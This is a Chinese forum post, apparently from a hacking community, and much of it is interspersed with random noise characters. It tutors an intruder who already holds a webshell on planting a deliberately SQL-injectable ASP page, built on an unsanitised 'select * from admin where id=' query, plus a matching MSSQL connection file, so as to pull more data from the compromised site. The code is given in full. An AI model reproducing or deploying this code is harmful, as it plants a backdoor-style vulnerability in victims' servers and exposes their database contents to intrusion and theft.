自己构造注入点方便入侵
$ C4 Y. |; ]; `) J* {- b1 y" D* U
+ ^2 D: H: t. U+ z' I8 ~" V今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
0 }0 A" {" G9 c+ H! X* R- L' i# Z, g, K- m6 }# }! S
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
! t6 q3 @2 y) M5 s
! a; \' L. j5 i3 j7 T' V首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
; v) H) K Y) g: H" i: x& l' G
* t2 R' ]( s% M+ W9 ^密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
! Z+ t& h' Q8 j$ d3 ]9 b/ g$ o8 K8 `. G( O3 m# t/ {2 ]! m
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
6 L; e( F7 p3 Y9 f, M% k% c7 c
) \2 J) ]7 y, r% |5 L程序代码& G# e) _8 y# A3 t, p }8 R
<!--#include file="xx.asp"-->
3 N2 q8 f) H) r# ~" G<%3 E. d3 P) J! K+ q* D b+ ~3 U
set rs=server.createobject("ADODB.recordset")
( F$ `0 n1 _ G9 B* H7 W0 `8 {id = request("id")/ b3 P) ?" o* P' M7 r. w- ?( ]
strSQL = "select * from admin where id=" & id+ @1 d U0 o6 q, f) U7 j$ l6 d
rs.open strSQL,conn,1,3
; \! Q6 ~7 {( ^% H( D% {rs.close' N2 }! ^ Q0 u' t# e2 D
%>( H# V- a4 m6 w8 e9 b
/ N; ^5 o" z$ y" T把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
& G3 N1 U: b# l2 j2 R0 r* H2 H+ Q8 D: ~! Z2 R0 S: m6 Q! n
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
3 U9 f$ ]% B4 ?8 B
0 g% f, L7 a3 X- t然后就要构造一个连接数据库的文件了,代码如下:1 i9 g* N; w: n
程序代码
! u, E7 F8 H# b<%
3 N2 Y4 f+ L$ i: l. j' W$ ]& RstrSQLServerName = "000.000.000.000" '服务器名称或地址
( e3 C# `# s3 s& ]7 M: AstrSQLDBUserName = "sqlname" '数据库帐号
' P- Z3 `9 g% s, |8 D/ g8 JstrSQLDBPassword = "sqlpass" '数据库密码# Y' s S& s; o' C
strSQLDBName = "sqldataname" '数据库名称
. F1 g! u- Y7 p! f* R! F6 t6 eSet conn = Server.CreateObject("ADODB.Connection")4 D0 I8 n. q5 |+ q% b0 V
strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
; o8 H$ ?, X! T$ R; o9 o$ nconn.open strCon
2 T% a0 @& D" E& K5 F' K& Y%>3 C! T0 x0 m) Z. h9 P; E! N
6 s9 Q+ Z1 M/ F/ F# K这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
; P( Q3 Q) F: T& Y% o% j2 `$ U
- Q) V& s8 b. [1 G( X. x! g' Z& J就这样,正常情况下,就OK了,伪造成功……
% F- h+ z: t. R0 X; e4 ^: X% f* h7 P2 g, c7 C# a# S
如果有什么问题可以提出来大家一起探讨解决。 |